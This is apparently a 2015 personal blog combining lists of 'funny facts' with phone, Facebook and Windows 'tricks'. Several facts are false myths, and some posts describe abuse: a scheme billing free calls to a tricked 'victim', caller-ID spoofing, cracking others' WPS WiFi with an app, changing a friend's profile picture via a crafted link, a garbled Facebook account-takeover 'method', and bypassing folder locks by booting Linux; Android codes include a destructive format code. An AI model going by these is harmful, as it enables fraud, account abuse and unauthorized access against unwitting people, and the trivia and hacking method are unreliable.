Sunday, 13 September 2015

193 Funny and Interesting Facts PART-3

62.According to security equipment specialists, security systems that utilize motion detectors won't function properly if walls and floors are too hot. When an infrared beam is used in a motion detector, it will pick up a person's body temperature of 98.6 degrees compared to the cooler walls and floor. If the room is too hot, the motion detector won't registera change in the radiated heat of that person's body when it enters the room and breaks the infrared beam. Your home's safety might be compromised if you turn your air conditioning off or set the ther mostat too high while on summer vacation. 63.Western Electric successfullybrought sound to motion pictures and introduced systems of mobile communications which culminated in the cellular telephone. 64.On December 23, 1947, Bell Telephone Laboratories in Murray Hill, N.J., held a secret demonstration of the transistor which marked the foundation of modern electronics. 65.The wick of a trick candle has small amounts of magnesium in them. When you light the candle, you are also lighting the magnesium. When someone tries to blow out the flame, the magnesium inside the wick continues to burn and, in just a split second (or two or three), relights the wick. 66.Ostriches are often not taken seriously. They can run faster than horses, and the males can roarlike lions. 67.Seals used for their fur get extremely sick when taken aboard ships. 68.Sloths take two weeks to digest their food. 69.Guinea pigs and rabbits can't sweat. 70.The pet food company Ralston Purina recently introduced, from its subsidiary Purina Philippines, power chicken feed designed to help roosters build muscles for cock fighting, which is popular in many areas of the world. 71.According to the Wall Street Journal, the cock fighting market is huge: The Philippines has five million roosters used for exactly that. 72.Sharks and rays are theonly animals known to man that don't get cancer. Scientists believe this has something to do with the fact that they don't have bones, but cartilage. 73.The porpoise is second to man as the most intelligent animal on the planet. 74.Young beavers stay with their parents for the first two years of their lives before going out ontheir own. 75.Skunks can accurately spraytheir smelly fluid as far as ten feet. 76.Deercan't eat hay. 77.Gopher snakes in Arizonaare not poisonous, but when frightened they may hiss and shake their tails like rattle snakes. 78.On average, dogs have better eyesight than humans, although notas colorful. 79.The duckbill platypus can store as many as six hundred worms in the pouches of its cheeks. 80.The life spanof a squirrel is about nine years. 81.North American oysters do not make pearls of any value. 82.Human birth control pills work on gorillas. 83.Many sharks lay eggs,but hammer heads give birth to live babies that look like very small duplicates of their parents. Young hammer heads are usually born head first, with the tip of their hammer-shaped head folded backward to make them more stream lined for birth. 84.Gorillas sleep as much as fourteen hours per day. 85.A biological reserve has been made for golden toads because they are so rare. 86.There are more than fifty different kinds of kangaroos. 87.Jellyfish like salt water. A rainy season often reduces the jelly fish population by putting more fresh water into normally salty waters where they live. 88.The female lion does ninety percent of the hunting. 89.The odds of seeing three albino deer at once are one in seventy-nine billion, yet one man in Boulder Junction, Wisconsin, took a picture of three albino deer in the woods.90.A group of twelve or more cows is called a flink. 91.Cats often rub up against people and furniture to lay their scent and mark their territory. They do it this way, as opposed to the way dogs do it, because they have scent glands in their faces. 92.Cats sleep up to eighteen hours a day, but never quite as deep as humans. Instead, they fall asleep quickly and wake up intermittently to check to see if their environment is still safe. 93.Catnip, or Nepeta cataria, is an herb with nepetalactone in it. Many think that when cats in hale nepetalactone, it affects hormones that arouse sexual feelings, or at least alter their brain functioning to make them feel "high." Catnip was originally made, using nepetalactone as a natural bug repellant, but roaming cats would rip up the plants before they could be put to their intended task. 94.The nematode Caenorhabditis elegans ages the equivalent of five human years for every day they live, so they usually die after about fourteen days. When stressed, though, the worm goes into a comatose state that can last for two or more months.The human equivalent would be to sleep for about two hundred years. 95.You can tell the sex of a horse by its teeth. Most males have 40, females have 36. 96.Money isn't made out of paper; it's made out of cotton.

193 Funny and Interesting Facts PART-2

35.Camels are called "ships of the desert" because of the way they move, not because of their transport capabilities. A Dromedary camel has one hump and a Bactrian camel two humps. The humps are used as fat storage. Thus, an under nourished camel will not have a hump. 36.In the Durango desert, in Mexico, there's a creepy spot called the"Zone of Silence." You can't pick up clear TV or radio signals. And locals say fireballs sometimes appear in the sky. 37.Ethernet is a registered trademark of Xerox, Unix is a registered trademark of AT&T. 38.Bill Gates' first business was Traff-O-Data, a company that created machines which recorded the number of cars passing a given point on a road. 39.Uranus' orbital axis is tilted at 90 degrees. 40.The final resting-place for Dr. Eugene Shoemaker - the Moon. The famed U.S. Geological Survey astronomer, trained the Apollo astronauts about craters, but never made it into space. Mr. Shoe maker had wanted to be an astronaut but was rejected because of a medical problem. His ashes were placed on board the Lunar Prospector space craft before it was launched on January 6, 1998. NASA crashed the probe into a crater on the moon in an attempt to learn if there is water on the moon. 41.Outside the USA, Ireland is the largest software producing country in the world. 42.The first fossilized specimen of Australopithecus afarenisis was named Lucy after the paleontologists'favorite song "Lucy in the Sky with Diamonds," by the Beatles. 43.Figlet, an ASCII font converter program, stands for Frank, Ian and Glenn's LETters. 44.Every human spent about half an hour as a single cell. 45.Every year about 98% of atoms in your body are replaced. 46.Hot water is heavier than cold. 47.Plutonium - first weighed on August 20th, 1942, by University of Chicago scientists Glenn Seaborg and his colleagues - was the first man-made element. 48.If you went out into space, you would explode before you suffocated because there's no air pressure. 49.The radioactive substance, Americanium - 241 is used in many smoke detectors. 50.The original IBM-PCs, that had hard drives, referred to the hard drives as Winchester drives. This is due to the fact that the original Winchester drive had a model number of 3030. This is, of course, a Winchester firearm. 51.Sound travels 15 times faster through steel than through the air. 52.On average, half of all false teeth have some form of radioactivity. 53.Only one satellite has been ever been destroyed by a meteor: the European Space Agency's Olympus in 1993. 54.Starch is used as a binder in the production of paper. It is the use of a starch coating that controls ink penetration when printing. Cheaper papersdo not use as much starch, and this is why your elbows get black when you are leaning over your morning paper. 55.Sterling silver is not pure silver. Because pure silver is too soft to be used in most table ware it is mixed with copper in the proportion of 92.5 percent silver to 7.5 percent copper. 56.A ball of glass will bounce higher than a ball of rubber. A ball of solid steel will bounce higher than one made entirely of glass. 57.A chip of silicona quarter-inch square has the capacity of the original 1949 ENIAC computer, which occupied a city block. 58.An ordinary TNT bomb involves atomic reaction, and could be called an atomic bomb. What we call anA-bomb involves nuclear reactions and should be called a nuclear bomb. 59.At a glance, the Celsius scale makes more sense than the Fahrenheit scale for temperature measuring. But its creator, Anders Celsius, was an odd ball scientist. When he first developed his scale, he made freezing 100 degrees and boiling 0 degrees, or upside down. No one dared point this out to him, so fellow scientists waited until Celsius died to change the scale. 60.At a jet plane's speed of 1,000 km (620mi) per hour, the length of the plane becomes one atom shorter than its original length. 61.The first full moon to occur on the winter solstice, Dec. 22, commonly called the first day of winter, happened in 1999. Since a full moon on the winter solstice occurred in conjunction with a lunar perigee (point in the moon's orbit that is closest to Earth), the moon appeared about 14% larger than it does at apogee (the point in it's ellipticalorbit that is farthest from the Earth). Since the Earth is also several million miles closer to the sun at that time of the year than in the summer, sunlight striking the moon was about 7% stronger making it brighter. Also, this was the closest perigeeof the Moon of the year since the moon's orbit is constantly deforming. In places where the weather was clear and there was a snow cover, even car headlights were superfluous.

193 Funny and Interesting Facts PART-1

If you use these small jokes on your presentation materials (publication, website, powerpoint, seminars, lecture, tv show, etc), please have the courtesy to QUOTE THE SOURCE. It is not easy collecting all these. Thank you!Please note that some of the 'facts' below have been proven false myths. An example is the duck's echo which does not echo (but proved that it does). 1.It is impossible to lick your elbow ( busted) 2.A crocodile can't stick it's tongue out. 3.A shrimp's heart is in it's head. 4.People say "Bless you" when you sneeze because when you sneeze,your heart stops for a mili-second. 5.In a study of 200,000 ostriches over a period of 80 years, no one reported a single case where an ostrich buried its head in the sand. 6.It is physically impossible for pigs to look up into the sky. 7.A pregnant goldfish is called a twit. ( busted?) 8.More than 50% of the people in the world have never made or received a telephone call. 9.Rats and horses can't vomit. 10.If you sneeze too hard, you can fracturea rib. 11.If you try to suppress a sneeze, you can rupture a blood vessel in your head or neck and die.12.If you keep your eyes open by force when you sneeze, you might pop an eyeball out.13.Rats multiply so quickly that in 18 months, two rats could have over a million descendants.14.Wearing headphones for just an hour will increase the bacteria in your ear by 700 times.15.In every episode of Seinfeld there is a Superman somewhere.16.The cigarette lighter was invented before the match.17.Thirty-five percent of the people who use personal ads for dating are already married.18.A duck's quack doesn't echo, and no one knows why. 19.23% of all photocopier faults worldwide are caused by people sitting on them and photo copying their butts.20.In the course of an average lifetime you will, while sleeping, eat 70 assorted insects and 10 spiders.21.Most lipstick contains fish scales.22.Like fingerprints, everyone's tongue print is different.23.Over 75% of people who read this will try to lick their elbow.24.A crocodile can't move its tongue and cannot chew. Its digestive juices are so strong that it can digest a steel nail.25.Money notes are not made from paper, they are made mostly from a special blendof cotton and linen. In 1932, when a shortage of cash occurred in Tenino, Washington, USA, notes were made out of wood for a brief period.26.The Grammy Awards were introduced to counter the threat of rock music. In the late 1950s, a group of record executives were alarmed by the explosive success of rock ‘n roll, considering it a threat to"quality" music.27.Tea is said to have been discovered in 2737 BC by a Chinese emperor when some tea leaves accidentally blew into a pot of boiling water. The tea bag was introduced in 1908 by Thomas Sullivan of New York.28.Over the last 150 years the average height of people in industrialised nations has increased 10 cm (about 4 inches). In the 19th century, American men were the tallest in the world, averaging 1,71m (5'6").Today, the average height for American men is 1,75m (5'7"), compared to 1,77 (5'8") for Swedes, and 1,78 (5'8.5") for the Dutch. The tallest nation in the world is the Watusis of Burundi.29.In 1955 the richest woman in the worldwas Mrs Hetty Green Wilks, who left an estate of $95 million in a will that was found in a tin box with four pieces of soap.Queen Elizabeth of Britain and Queen Beatrix of the Netherlands count under the10 wealthiest women in the world.30.Joseph Niepce developed the world's first photographic image in 1827. Thomas Edison and W K L Dickson introduced the film camera in 1894. But the first projection of an image on a screen was made by a German priest. In 1646, Athanasius Kircher used a candle or oil lamp to project hand-painted images ontoa white screen.31.In 1935 a writer named Dudley Nicholsrefused to accept the Oscar for his movie The Informer because the Writers Guild was on strike against the movie studios. In 1970 George C. Scott refused the Best Actor Oscar for Patton. In 1972 Marlon Brando refused the Oscar for his role in The Godfather.32.The system of democracy was introduced 2 500 years ago in Athens, Greece. The oldest existing governing body operates in Althing in Iceland. It was established in 930 AD.33.A person can live without food for about a month, but only about a week without water. If the amount of water in your body is reduced by just 1%, you'll feelthirsty. If it's reduced by 10%, you'll die.34.According to a study by the Economic Research Service, 27% of all food production in Western nations ends up in garbage cans. Yet, 1,2 billion people are underfed - the same number of people who are overweight.


facebook-1.jpg→ First of all you need to join lots of facebook groups. After joining wait for admin approvel to become a member of group. → After geting approvel from groups admin we have to collect the facebook e-mail addresses of joined facebook groups. → Some groups prvide their facebook e-mail address in their group info.Otherwise we have to find the username of the group.We can easily get the username of facebook groups by opening them into our browser.After opening groups you can see group address on our browser address bar.It will something like below link. /groups/UserName → Copy the username ofthe facebook group and paste them into notepad or wordpad. → Now its time create facebook groups e-mail address from their user names.We just need to paste the username just before @ Now facebook groups e-mail address look like below e-mail address. → Use above steps to create e- mail address for all joined groups and don't forget to seperate them with commas (,) .After creating e-mail addresses for all groups save them into notepad,wordpad,MS Word etc. → Now sign in your e-mail address which you have used to create acount on facebook. → Than click on compose e-mail option. → Now copy all facebook groups e-mails and paste them into BCC field. → Now compose compose youmail with text,links and images that you want to post.And click on send button. → That's it.Now check facebook groups, your message is successfully posted in all groups. Visit agian :D Vikas MyAiM

Convert Your Facebook Profile Into Page

facebook-2.jpgHi Friends...Today, I Will Tell You, How To Convert Your Fb Profile To Page... ! Follow the steps . ¤ First Login To Your Facebook Account Which You Want To Convert *. Then Click Here - https:// /create.php? migrate To Go To The Migration Page . . Mark On I Agree To Facebook Pages Terms And Conditions... ! . Then Click On "Get Started " . Now Your Facebook Profile Becomes Your Facebook Page . . Enjoy! Everything Is Done... Things To Remember Before Converting Facebook Profile Into Page:- . All your confirmed friends and subscribers will be converted to people who like your new Page . . Your current profile picture will become your Page's picture. *. Your Username Will Become Your Page's Username.. ! :D :D KEEP VISITING DAILY GYESSS :D

Saturday, 12 September 2015


20150912223629.pngTrick 1: Step1:Think of a number . Step2:Multiply it by 3. Step3:Add 6 with the getting result. Step4:divide it by 3. Step5:Subtract it from the first number used. Answer:2 Trick 2: Any Number Step1:Think of any number. Step 2: double the number. Step3:Add 9 with result. Step4:sub 3 with the result. Step5:divide the result by 2 .Step6:Subtract the number with the number with first number started with. Answer: 3 Trick 3: Any three digit Number Step1:Add 7 to it. Step2:Multiply the number with 2. Step3:subtract 4 with the result. Step4: Divide the result by 2. Step5:Subtract it from the number started with. Answer: 5


android-mobile.jpgAll Android Devices Cheat Codes and Tricks.Hello guys, today i am going to share several secret codes for Android Mobile Phones. These android codes will help you to explore more about your android Phone. Secret codes are those codes which are usually hidden from users for any misuse and exploit. Aswe all know android is very new platform and thus very few codes of androids are there on internet. Today i am sharing all the codes of androids cellphones that i know. And i surely hope you can't find codes better than that. So friends let's hack and explore our android Phones. Secret Hacking codes for Android Mobile Phones * 1. Complete Information About your Phone ##4636#*#* .This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:Phone information, Battery information ,Battery history Usage, statistics... . 2. Factory data reset ##7780#*#* Thi s code can be used for a factory data reset. It'll remove following thing Google account settings stored in your phone System and application data and settings Downloaded applications . It'll NOT remove:Current system software and bundled application SDcard files e.g. photos, music files, etc. Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation. 3. Format Android Phone 27673855# Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also re install the phone firmware. Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So THINK TWICE before giving this code. 4. Phone Camera Update ##34971539#*# * This code is used to get information about phone camera. It shows following 4 menus::Update camera firmware in image (Don't try this option) ,Update camera firmware in SD card , Get camera firmware version, Get firmware update count, WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to re install camera firmware. 5. End Call/Power ##7594#*#* This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows ascreen asking you to select any option from Silent mode, AirPlane mode and Power off. You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option. 6. File Copy for Creating Backup ##273283*255*663282*#*#* This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo. 7. Service Mode ##197328640#*#* This code can be used to enter into Service mode. You can run various tests and change settings in the service mode. 8. WLAN, GPS and Bluetooth Test Codes:*#*#232339#*#* OR ## 526#*#* OR ##528#*#* - WLAN test (Use"Menu" button to start various tests)*#*#232338#*#* - Shows WiFi MAC address ##1472365#*#* - GPS test ##1575#*#* - Another GPS test ##232331#*#* - Bluetooth test ##232337#*# - Shows Bluetooth device address 9. Codes to get Firmware version information:*#*#4986*265046 8#*#* - PDA, Phone, H/W, RF Call Date*#*#1234#*#* - PDA and Phone*#*#1111#*#* - FTA SW Version*#*#2222#*#* - FTA HW Version*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number 10. Codes to launch various Factory Tests: ##0283#*#* - Packet Loopback ##0*#*#* - LCD test*#*#0673#*#* OR ## 0289#*#* - Melody test ##0842#*#* - Device test (Vibration test and BackLight test) ##2663#*#* - Touch screen version ##2664#*#* - Touch screen test ##0588#*#* - Proximity sensor test ##3264#*#* - RAM version *NOTE: USE THESE CODES AT YOUR OWN RISK WE ARE NOT, RESPONSIBLE FOR ANY DAMAGE! hacker-myaim.jpgCode collected by: Vikas MyAiM

Friday, 11 September 2015

Make 30 Minutes Free Call With Your Friend NumberTo all over india *Criminal Work*

Firstly Download Tring (beta) App From play store Now open the App it shown registration formput fake email addressand your friend Number,Now it asking verificationBy call tring app mobile Number,Now Message Your Friend"hey call this Number-Number Now it's giving 10rs. Free Recharge Full Amount,wait for victim response.Now this app automatically showing home page after the victim call click "dial pad "Balance-15.45 rs. credited To You Now call anyone with this App,Reciever receiving call with victim Mobile You It's my criminal mind work,But don't use this for criminal purposes......

How To Call Customer Care Without Wasting Your Time

hacker-myaim-green.jpg S Simply dial“your cust. care no.” p2p2p2p9 For example :-AIRTEL:- 198p2p2p2p9 or 198p2p2p2p2p2p9 RELIANCE & AIRCEL:- 198p2p2p2p9 IDEA:- 4444p2p2p2p9 Note:-To appering “p” dial three times or dial contineously.Enjoy :D oy

Thursday, 10 September 2015

How To Check Who Has Read Your Message In WhatsApp Groups

hacker-myaim-green.jpgIn What’s app group chat is really a fun, chat with all your friends at once, but it becomes very difficult to determine who has read your message ,for individual message the blue ticks and double ticks make it very easy and simple...Here is the method to view Reads for group chat...What’s app is one of the most popular messaging service with over 500 Million active monthly users and 700 Million Photos,100 Million videos shared every day....How to view Message Reads on group :-To view the message reads on a group just open a group...Click and hold a single message and tap from top...You will get the status for reads.Now when you know how to determine who has read your message ,You can easily point out which friends have read the message and which once has got it delivered and the remaining once haven’t actually received the message yet...


Hi Guys.... Check Out This Cool WhatsApp Trick To Send Blank Messeges !! You just need an app Noword on your phone download NOWORD.EMPTY OR BLANK MASSAGE 1. Once the app gets downloaded pen it and clickthe send button.. 2. Now what’s app will open showing you the contacts.. 3. Choose a contact and send the message, Your blank Message will be send... !!

Root Android phone with your Android *No Need Pc*

Download Below Apk App framaroot framaroot-1-9-3.apk Step 3: Install Framaroot from the apk file...Step 4: Choose “install Superuser” option inside Framaraoot...Step 5: Select any of the exploits that appears in the appand wait for some time....Step 6: If you see a “Success … Superuser and su binary installed. You haveto reboot yourdevice” message then you have successfully rooted your phone...Step 7: If you see “Failed … Try anotherexploit if available” message then try selecting another exploit Now your Android Will Root

How use SD card as RAM in your Android

INTRODUCTION:- .Now Everyone Is UsingAndroid Smartphone In fact Almost 90% Of Mobile Phones Are Android now a days..There is a Big Problem For Low Android Phones Which Runs On Android 2.0 to 4.0 is Problem Of not Enough Memory now.*.When This Pop-up Comes To Our Mobile Screen It Drives us so lazy or crazy. .So Without Wasting your Time Lets go To The trick To Solve This. HOW TO USE SD CARD AS RAM:- .First of all Download This App from . .Now Install it in your android. .Then you need to create a swap file to click on Swap activation and Enable it to Click on Activate swap. .Now All is done. .Lastly Success Now Your android Moved in RAMTo Your SD Card. NOTE:- *.This Method only Works in Rooted Android mobile Because this App Requiring Super user Permissions in the android.

How To Increase Your Android Battery

Android Is A Best Device Than All Other .. But There Are A Big Problem ... Android Battery Capacity Is Very Low...So Here I Am Posting A New Trick To Increase Your Android Battery Life... Follow The Bellow Steps -1- First Of All Take Your phone in your hand ... 2- Now Go To Your Phone Settings... 3- Now scroll down And Select About Phone... 4- Now You Will See A Option “build Number There" 5- Tap 7-10 Times on the build number and you see developer options will get activated. 6- Now get back To settings and a new option Developer Option will get added there.7- Click on Developer Option and scroll down. 8- You will see options Window Animationscale, Transition Animation Scale and Animation Duration Scale.... 9- Now By default their value would be 1.0..... 10- Set them to 0.5 or off them all..... That's it you are done this will increase your battery backup of Android up to 30-40%. Increase Battery Backup Of Android Using Greenify App 11- Download and Install Greenify App 12- Now open the app and grant it the superuser access. 13- Now click on Button on the top of the app and select the apps which you think you mostly use • Now click on tick.That's It Now This App Save Automatically Battery From Your Device
Trick By:→ѷїkas MyAiM


hacker-myaim.jpgHello guyz ,This Trick is Awesome as well as unbelievable and I Am Also enjoying This Trick By using this trick .you can able to make free call on android mobile. .FEATURES THIS TRICK:--No data pack is needed. save your money by avoiding recharge.For using this app No need of data pack.Voice clarity is great. Get unlimited minutes for make free call...... JUST FOLLOW THE STEPS» First Download FLIPCALL APP also download by given link .» Then sign up by filling your details. .» Now it will ask you to make a call Don't worry, You will not get any charged. .» Then After Sign up you will receive credits in your flip call account. .» Finally use them credits to make free calls without any problem. .» If you call india and you can enjoy 120 Min of Free Calling . » It's done enjoy and share this trick with your friends. NOTE :-When your flipcall balance becomes Rs. 0 simply go to setting>app manager>flipcall and clear the data Again signup with new details and enjoy free calling . HAPPY TO HELP YOU, KEEP VISITING DAILY, :D

How to Make a Fake Call/Any Number To Any Number Call

Hello friendshere is a trick for through which you can make fake call ( call spoofing )...CrazyCall is the ultimate tool for making prank calls and fooling your friends.You can change your CallerID, so when you call someone he sees on his Caller ID display the number you selected. You can also change the pitch of your voice for deep and creepy or high and funny. 20150910202506.jpg1. First go to . .2. Select your country. .3. Type the number that you want to appear on your friends phone when he receives the call ....4. Enter your number .5. Select pitch and click on "Get me a code " . .6. Then you will get two thing a number and a code 7. Call to that number from your moblie .8. When they asks you enter the code. ..9. Thats it now call will be connected to your friend but insted of your number, the number which you entered earlier will be displayed to him.
Trick By:→ѷїkas MyAiM
Note :- 1. Please dont use this for illegal activites, i am not responsibile for such things. 2. International call charges will be applied for that call. ENJOY :D

Hack a Secured Wifi Network With Android mobile (100% Working)

Hi Friends…...!After A Long Research… Today M Back With Most Wanted Wifi Hacking App, Which Will Really Amaze You With Its Features And Its Capicity To Hack Wifi Network Effectively. And This App Will Helps You To Crack Any Wpa/Wps Enabled Wifi Networks. And Now Without Wasting Any More Time Come Let Us Go To Actuall Steps To Make Use Of This Wifi Tool. 20150909233857.pngYour Phone Must Be Rooted!!!....How To Hack Wifi Network Within Few Seconds:::::...*. In Order To Hack Wifi Network You NeedTo Download Wifi Wpa Wps Tester App .....*.Then Switch On Your Wifi Network And Scan For Available Wpa/Wps Wifi Network..... . As Soon As You Notice Available Wifi Network Then Open “Wifi Wpa Wps Tester”App........ Now You Need To Click On Green Colour Reffresh Button And It Will Show You All Available Networks There......*. Now Just Click On [Green Colour Locked Key Locker] Symbol And Click On Try To Connect Network Option........*. Now It Will Show You Some Thing Like This: Ssid=”D-Link”Psk=”password”Key_mgmt=WPA-PSKPriority=1}-ssid=”D-Link”key_mgmt=NONEpriority=6} . Now You Can See Password Of That Wifi In The Above Given Code, Which Is Coated Just Infront Of The Text Psk..For Ex: In The Above Case The Password Of The Wifi Network is password.*. Yipeee! You Are Done! You Have Hacked Wifi Network Sucessfully…...... Proof:::: 20150909233904.pngNote:*. This Wifi Hacking Tool Will Only Work On wpa/wps Wifi Networks So Don’t Try With Just wpa Or Wpa2 Networks And Don’t Loose Your Hope......*.Even Though You Try Hack wpa/wps Networks Some Times It Failed To Hack And Its Due To You Are Too Far Away From Router Or Rourter Is Not Vunerable To Hack...... .Please Don’t Try This With Public Wifi Networks As It Was Illegal To Do That......This Post Is Just For Educational Purpose And To Retrive Your Own Password Of Your Own Wifi Network. And We Don’t Take Any Responsiblity Of Any Missuse Of This Tool Or This Article.

Wednesday, 9 September 2015

Change Friend Profile Pic

facebook-1.jpghow to chang frnd ptofile picture→→STEP 1 : Login with your facebook account. STEP 2 : Select the friend whose profile picture you want to change. STEP 3 : Select any photo from facebook , open it and in the url of photo add &makeprofile=1 STEP 4 :Now send this url to the selected friend along with &makeprofile=1 at the end.That's it. Done when your friend click the link he will be automatically redirected to profile image cropping page , when your friend crops the image his profile picture will be automatically changed . Make sure that your friend crops the image
Trick By:→ѷїkas MyAiM

Get Notified When Someone Unfriend You

Get Notified When Someone Unfriend You......To get the notification when someone unfriend you, download unfriend alertchrome extension and activate it. It will add an additional Unfriends Tab on Facebook so whenever someone unfriend you, you’ll get notified. This tab will alsonotify you about pending friend requests.

New Facebook Hacking Method

Here is The Trick Firstly Find Victim ip address Now go to Internt Settings,Put victim ip address In proxy ,No Need Port Go to Select Any Fake status update device Now copy your url Link, Give it to victim Now refresh your page again and again...If victim click your link,You Are Entered To Victim Account And it shows status update box Update Any status ,Now you are redirect to victim's Facebook Homepage Now open Facebook. com/hacked Its giving password change option Without asking old password Change password, and remove Email in this same process...Add your email and enjoyIts my thinking..Please check and say My thinking is correct or Not.

Get Unlimited Free Facebook Likes 100% working

facebook-1.jpgwant increase your facebook likes here is the easy and 100% working trick sing up this link after sign up you will get 50 points then click "add page"choose what you want get followers or likes copy and paste your link which you want get likes save it and start get unlimited likes 1000% working.....Enjoy.... :D

How To See Your Friends Hidden Friend List On Facebook

welcome-to-my-blog.jpg It's Very Easy Trick To Use.Go to create a complete new account after complete the new account registration,send friend request to the"targetted person"now click the"people you may know"and click "see all"in this option you can view the friend's of the "victim. "NOTE:don't add or confirm other friend need that person accept your's easy to use...Must Try It Guyz.

Tuesday, 8 September 2015

How To Make Your Name Code [ Facebook ]

facebook-2.jpg Today I Will Tell You How To Make Your Own Name Code On Facebook...Follow These Simple Steps -. 1- First Of All Open Fb On Uc Or Opera....2- After Open Go To Events And Create A Event ....3- In Event Name, Type Your Name.....4- Then Fill All Details. And Choose Event Privacy Public.....5- Then Create Event And Invite At least 2 Friend.....6- Now Go To Your Event Whose You Created......7- Now Copy All The Event Link...Now Find Event 15 Digits Code On The Link.....And Type Like This -@[YourCode:] Enjoy :D


Trick By:→ѷїkas MyAiM
p-c-2.jpgSET A VIDEO AS UR DESKTOP BACKGROUND>>Set a video as ur desktop background instead of wallpaper.To set a video background just follow this simple steps:-1.First of all u need a VLC player installed in ur PC to perform this task.If not then download the VCL player frm internet and install it.....2.Run VLC media player go to settings>prefereces>interface>main interfaces>then click on Wx widgets remove the tick on"task bar"and put a tick on"systray icon".....3.Now go to Video>Out put modules>Directx.On the bottom right put a tick on advanced option check box.You will now see some options,put a tick on"Enable wallpaper mode"......4.Now select playlist and put a click or tick on "Repeat current item">......5.Press the save button.Now close the VIC player and run it again (to save the settings permanently)......6.Now play any video u would like to set as wallpaper.Right click on the video and click on "Wallpaper".Video would be set asur wallpaper.


SHUTDOWN PC FASTER>>Press Ctrl+alt+delOpen task manager>>Click the shutdown Tab.While holdin ctrl key.Press TURN OFF

Change Windows Password Without Knowing Old One

Step 1 :Start Menu > Computer > Right Click >Manage Step 2 :System Tool > Local User and Group Step 3 : double Click on User (exp. your Pc Name )Step 4 :Chose User > Right Click on It > SetPasswordStep 5 :Click on Proceed buttonStep 6 :Then Set your New Passowrd.

Create Nameless Folder In Windows

Trick By:→ѷїkas MyAiM
This trick will allow you to make folder without any name. This trick works on anywindows operating system.Before attempting this trick, try to make a folder with no name and you will fail to do so.Steps to make Nameless folder. 1. Make a Newfolder Any where.2. Right click on newly created folder and select Rename .3. Erase the text showing “New Folder”.4. Now keep Pressing Alt (i.e alter key) andtype 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.5. After that leave alt key and Press enter .6. Done you just created nameless folder.

Remove Thumb.db file

Thumb.db is is a cache of the currentpicture in that directory... to remove it go forfollowing step.. 1 > open “WINDOWS EXPLORER”... 2>go to “TOOLS”.... 3>open “FOLDER OPTIONS”..... 4>go to “VIEW”.....5>see 1st section “FILES & FOLDERS”... 6>click on the “DO NOT CACHETHUMBNAILS”... .now the thumbnail file will be removed fromur computer once u do this the file will be never created.


p-c-1.jpgToday i am posting thread for When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key +Num Lock and click OK or press enter. Use the Numerical pad for controlling the mouse pointer. 5 is for click ,+ is for double click, - for right click. On Screen Keyboard On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick... To use it go to start-> run and type osk Trick By:- Vikas....

How To Take/Capture Screenshot On Your Computer

Hi Guys...Welcome Back !!! Using the default keyboard shortcuts Taking a screenshot on Windows is one of the easiest tasks possible, regardless of which version of the operating system you’re running. There are only a few steps – assuming you haven’t fiddled with the innate keyboard controls – and you should already have access to all the image- editing software you need.... Step 1: Capture the image: Assuming the area youwant to capture is displayed on your screen, press the Print Screen button typically located in the upper right-hand corner of your keyboard to capture a screenshot of your entire display... Alternatively, press Alt+ Print Screen to merely capture a screenshot of the active window... Keep in mind there will be no noise or any other indication the screenshot was taken, but the resulting image will be saved as a PNG file to your clipboard. If using Windows 8, simply clickthe Windows Key + Print Screen to automatically save a full-screen screenshot within the Screenshots folder of your picture directory...... Step 2: Open Paint: Click the Start menu, navigate to theAccessories folder, and click Paint from the list of native Microsoft software. The icon depicts a painting palette with a brush on the right-hand side, but it will vary slightly depending on your operating system. Alternatively, search and open theprogram from the Windows search bar. OnWindows 8, press the Windows key to open the start screen. Afterward, click the down arrow in the bottom left, press Ctrl + Tab, or swipe downward from the center of the display to access the Apps View. From there, select Paint..... Step 3: Paste the screenshot: Once open, click the Paste button in the upper left- hand corner of the program, choose Edit then Paste, or press Ctrl + V on the keyboard to paste your screenshot.. Again, the exact navigation and wordage will vary slightly from OS to OS, but the keyboard shortcut will remain the same...... Step 4: Save the screenshot: Perform any edits you want, such as cropping the image to a specified area, and click the main File option in the top-left corner. Afterward, select Save as, title the new file, choose a save location, and select your desired file format from the drop-down menu. For most purposes, JPG will do fine, but a variety of other formats are available to choose from suchas PNG, BMP, GIF, and others. Click the gray Save button in the bottom right-handcorner when finished... Thats It, Must Share & Visit My Blog Daily !!...... by owne: -_•Vikas

Unlock all 6 Hidden Themes In Windows 7 and Vista

Trick By:→ѷїkas MyAiM
p-c-1.jpgUnlock all 6 Hidden Themes In Windows 7and Vista : Windows 7 Have many New And Hidden Features and Beautifull Themes.All This type of features are not possible to access to Common people. So this type of features are revelled to you by this page. I will teach you step by step how to unlock hidden themes in yourown windows 7 & Vista without download ing any software... STEP 1 : - Go to My Computer. STEP 2 : - type in Address Bar C: \Windows\Globalization\MCT STEP 3 : -Hit enter. and unlock the theme by double clicking on theme.

How To Hack Locked Folder In pc. *Tested by Vikas*

hack to fix the Folder Lock forgotten password . Step #1. Inserted PuppyLinux Live CD ( macPup 550) in his CD Drive Step #2. Configured the PC bios to boot from CD Step #3. Rebooted the PC Step#4. logged into the PuppyLinux Step #5. Mounted his D drive ie Partition where the 'Folder Lock' locked folder was present. Step #6. Browsed into the folder -- now I could open the contents without any password. Step #7. Opened some of them& shocked my friend. -- " files are back " -" Wait !! Work is half done" Step #8. copiedall the files and subfolders to another location Step #9. Removed the PuppyLinux CD from the cd Drive Step#10. Rebooted the Windows. Step #11. The 'Folder Lock' password protected folder was in it's old place as it was untouched by us It had no clue what has happened and unaware that we had hacked it and copied all it's contents. Step#12. The new folder was present with all the contents intact. Sorry No ScreenShotstaken as I was working on Real Life CriticalMission. How the Hack worked : The FolderLock s/w works in windows . It makes use of Windows APIs to give access to the locked Folders/files We booted the PC using Linux OS Here the FolderLock API didn't work & worked as aninjured enemy in war. What was left for us to do was to walk over and collect whatever we wanted. SIMPLE !! Hope you like my new real life Hacking Experience If you too want to repeat it, you can do it 